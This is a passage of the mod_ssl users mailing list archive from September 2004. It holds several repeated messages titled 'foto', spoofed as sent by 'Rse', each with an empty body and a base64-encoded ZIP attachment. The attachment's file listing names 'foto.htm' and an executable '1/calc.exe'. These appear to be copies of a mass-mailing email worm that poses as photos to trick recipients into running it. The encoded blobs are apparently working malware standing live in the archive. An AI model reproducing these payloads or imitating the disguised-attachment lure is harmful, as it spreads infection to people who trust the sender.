fZdahuI41NworzFkK3xyNNnpPlK+jKRXissK+iOeXH89a/GjVL7gsFRaHLdo1NifuomTVHr4
Q6Qr30qKOyodQo4xNcOKUSwC6UE17OG8rjVPOCVwakep5KDh8yu/TscVRxHH2Ci15Xexq8Pb
ki+64aKhj9RYVEWbXzC60pJhLKdXV2JYK4r8BKB2rbt/lI7Lt9wiE5ij8LBwuqsSu4idjtNA
PgTFzDJmjTv89o4WJdNhebbjwf+yR+Qbh9pD8AJbMlTx3CImXTIxzBjH4vJUnUn5BVrI8FWt
4O6T8d+lCwcuqI79WyzUiExMF9OUkS9sg7meo7Kc3OJ2S0YZV2rEO57jFhQ3q8l80+uqsHFz
a+viYU/oOmekLq64roT/HGuVc01cArpr6zmthgZB87ik+btHc/za06ibRZyhmzXUo6bKH5c2
RoewCOUmxmEJH92xqDJcQ4iFjV1QclXLd5i51W7jYg2ERh5XG3z5FYIpo1bVOadgiIo57lRz
xPL1DFcf4o6DjMsZfPVdy8OuM+ATRS0nJ233iKdgXV9lkTS0pmoiK172Fvy5EH9zTHduV0wE
qnYiKFIbPipNkE6G1c+MsEw6NcXM0bAE3pCeSwSvryEtfIQlg0MI9MVfzTCIe69fbv6PUlPw
9y23tXa1rm5rbbu3bU+b0pZvG2g/0/5QLBd7PPbl2Hdiz8SOx07HXo39JPYb8Vj8nnhnfChu
xO34WPwP4k/E/zg+Hf9K/FD8G/Fvxg/Hj8Sfic/En4ufif8o/lL81fhP46/H34r/PD4Xr9vU
sGn5ppWb1mx6rwd9I5UTwmYDIYR9dVmnd3b3DSR6k4PbdUReDiKswfAXgMFOz0a0Uf6BYLDX
C9+V9/bZSnHAVMmCl/8FD+q7grcH8YNBcqxc5L8YoBT8fNFLuRcY/qgh3ujDN/vtYNjF99pS
78f0P1BLAQIUABQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAAAAAAAEAIACAgQAAAABmb3Rv
Lmh0bVBLAQIUAAoAAAAAAIqyITEAAAAAAAAAAAAAAAACAAAAAAAAAAAAEgDAQXwAAAAxL1BL
AQIUABQAAAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAAAAAAAAAIgDAgZwAAAAxL2NhbGMuZXhl
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------wgzwuoouobziioiwhtgs--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 01:22:51 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1430BA8D07; Wed,  1 Sep 2004 01:22:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mssreddyt21.net (adsl-68-126-149-204.dsl.pltn13.pacbell.net [68.126.149.204])
	by master.modssl.org (Postfix) with SMTP id A464AA8982
	for ; Wed,  1 Sep 2004 01:22:44 +0200 (CEST)
Date: Tue, 31 Aug 2004 16:23:23 -0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dloeixhvqrelzfbyfyhv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dloeixhvqrelzfbyfyhv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------dloeixhvqrelzfbyfyhv
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------dloeixhvqrelzfbyfyhv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 01:44:25 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 48F13A8A79; Wed,  1 Sep 2004 01:44:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sulsajukke.org (24-168-159-71.nj.rr.com [24.168.159.71])
	by master.modssl.org (Postfix) with SMTP id 773BAA8982
	for ; Wed,  1 Sep 2004 01:44:19 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:44:19 +0900
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vwxadgkydevvykpezrtr"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vwxadgkydevvykpezrtr
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------vwxadgkydevvykpezrtr
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------vwxadgkydevvykpezrtr--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 02:17:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0F82DA8943; Wed,  1 Sep 2004 02:17:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dhcp-skumar-1.org (cm251.omega184.maxonline.com.sg [218.186.184.251])
	by master.modssl.org (Postfix) with SMTP id 87C8FA8934
	for ; Wed,  1 Sep 2004 02:17:16 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:16:08 +0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ziksqrfskkmodihdxuyq"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ziksqrfskkmodihdxuyq
